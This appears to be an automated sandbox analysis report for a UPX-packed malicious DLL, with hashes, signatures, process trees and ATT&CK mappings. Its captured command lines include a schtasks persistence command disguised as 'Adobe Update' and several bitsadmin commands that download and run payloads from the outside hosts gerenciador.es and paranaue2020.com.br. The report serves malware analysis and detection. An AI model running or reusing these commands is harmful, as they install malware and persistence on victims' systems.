d6554b9e57355fcb9eccb91ca38225452adc0daf1f056289d7d5c9fc137fb0e7

General

Target

d6554b9e57355fcb9eccb91ca38225452adc0daf1f056289d7d5c9fc137fb0e7.dll
Size

113KB
MD5

753d394c2ed1a1ea4a5eaa6fba171307
SHA1

308a9ad7842a570289b3acc1e4011e8938426423
SHA256

d6554b9e57355fcb9eccb91ca38225452adc0daf1f056289d7d5c9fc137fb0e7
SHA512

cf1c833bcbad8203cc67416be586e5ca63495456dc44518b85fc6fd018496a81299884f1701583f77321f80cc1a357d507d55cf375c3758865b4013aa607c7ca
SSDEEP

1536:o8b0zyJO5R1fGyPk8zS6lglv9xs+YuVfJfQViw1jkt5PY3P6d5sXmbHDK9hEz+ew:o8Ns5HuaKlAihQ5jcxgP6b9bjKlYU

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/788-56-0x0000000000210000-0x0000000000263000-memory.dmp	upx
behavioral1/memory/788-57-0x0000000000210000-0x0000000000263000-memory.dmp	upx

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1464 788 WerFault.exe rundll32.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1080 schtasks.exe
Download via BitsAdmin 1 TTPs 4 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid process

1776 bitsadmin.exe
860 bitsadmin.exe
904 bitsadmin.exe
1772 bitsadmin.exe

pid	pid_target	process	target process
1464	788	WerFault.exe	rundll32.exe

pid	process
1080	schtasks.exe

pid	process
1776	bitsadmin.exe
860	bitsadmin.exe
904	bitsadmin.exe
1772	bitsadmin.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

rundll32.exerundll32.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1612 wrote to memory of 788	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 788	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 788	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 788	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 788	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 788	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 788	1612	rundll32.exe	rundll32.exe
PID 788 wrote to memory of 1692	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1692	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1692	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1692	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 984	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 984	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 984	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 984	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1376	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1376	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1376	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1376	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 2036	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 2036	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 2036	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 2036	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1332	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1332	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1332	788	rundll32.exe	cmd.exe
PID 788 wrote to memory of 1332	788	rundll32.exe	cmd.exe
PID 1692 wrote to memory of 1080	1692	cmd.exe	schtasks.exe
PID 1692 wrote to memory of 1080	1692	cmd.exe	schtasks.exe
PID 1692 wrote to memory of 1080	1692	cmd.exe	schtasks.exe
PID 1692 wrote to memory of 1080	1692	cmd.exe	schtasks.exe
PID 984 wrote to memory of 860	984	cmd.exe	bitsadmin.exe
PID 984 wrote to memory of 860	984	cmd.exe	bitsadmin.exe
PID 984 wrote to memory of 860	984	cmd.exe	bitsadmin.exe
PID 984 wrote to memory of 860	984	cmd.exe	bitsadmin.exe
PID 1332 wrote to memory of 904	1332	cmd.exe	bitsadmin.exe
PID 1332 wrote to memory of 904	1332	cmd.exe	bitsadmin.exe
PID 1332 wrote to memory of 904	1332	cmd.exe	bitsadmin.exe
PID 1332 wrote to memory of 904	1332	cmd.exe	bitsadmin.exe
PID 2036 wrote to memory of 1772	2036	cmd.exe	bitsadmin.exe
PID 2036 wrote to memory of 1772	2036	cmd.exe	bitsadmin.exe
PID 2036 wrote to memory of 1772	2036	cmd.exe	bitsadmin.exe
PID 2036 wrote to memory of 1772	2036	cmd.exe	bitsadmin.exe
PID 1376 wrote to memory of 1776	1376	cmd.exe	bitsadmin.exe
PID 1376 wrote to memory of 1776	1376	cmd.exe	bitsadmin.exe
PID 1376 wrote to memory of 1776	1376	cmd.exe	bitsadmin.exe
PID 1376 wrote to memory of 1776	1376	cmd.exe	bitsadmin.exe
PID 788 wrote to memory of 1464	788	rundll32.exe	WerFault.exe
PID 788 wrote to memory of 1464	788	rundll32.exe	WerFault.exe
PID 788 wrote to memory of 1464	788	rundll32.exe	WerFault.exe
PID 788 wrote to memory of 1464	788	rundll32.exe	WerFault.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d6554b9e57355fcb9eccb91ca38225452adc0daf1f056289d7d5c9fc137fb0e7.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d6554b9e57355fcb9eccb91ca38225452adc0daf1f056289d7d5c9fc137fb0e7.dll,#1
2⤵
- Suspicious use of WriteProcessMemory
PID:788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://gerenciador.es/a001.jpg C:\Users\Admin\AppData\Local\Temp\a001.cpl &C:\Users\Admin\AppData\Local\Temp\a001.cpl" /ru SYSTEM /f
4⤵
- Creates scheduled task(s)
PID:1080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:984

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
4⤵
- Download via BitsAdmin
PID:860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
3⤵
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
4⤵
- Download via BitsAdmin
PID:1776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
4⤵
- Download via BitsAdmin
PID:1772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
3⤵
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://paranaue2020.com.br/a001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
4⤵
- Download via BitsAdmin
PID:904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 788 -s 332
3⤵
- Program crash
PID:1464

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

BITS Jobs

1

T1197

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/788-54-0x0000000000000000-mapping.dmp

Download
memory/788-55-0x0000000076681000-0x0000000076683000-memory.dmp

Filesize
8KB

Download
memory/788-56-0x0000000000210000-0x0000000000263000-memory.dmp

Filesize
332KB

Download
memory/788-57-0x0000000000210000-0x0000000000263000-memory.dmp

Filesize
332KB

Download
memory/860-64-0x0000000000000000-mapping.dmp

Download
memory/904-65-0x0000000000000000-mapping.dmp

Download
memory/984-59-0x0000000000000000-mapping.dmp

Download
memory/1080-63-0x0000000000000000-mapping.dmp

Download
memory/1332-62-0x0000000000000000-mapping.dmp

Download
memory/1376-60-0x0000000000000000-mapping.dmp

Download
memory/1464-70-0x0000000000000000-mapping.dmp

Download
memory/1692-58-0x0000000000000000-mapping.dmp

Download
memory/1772-66-0x0000000000000000-mapping.dmp

Download
memory/1776-67-0x0000000000000000-mapping.dmp

Download
memory/2036-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads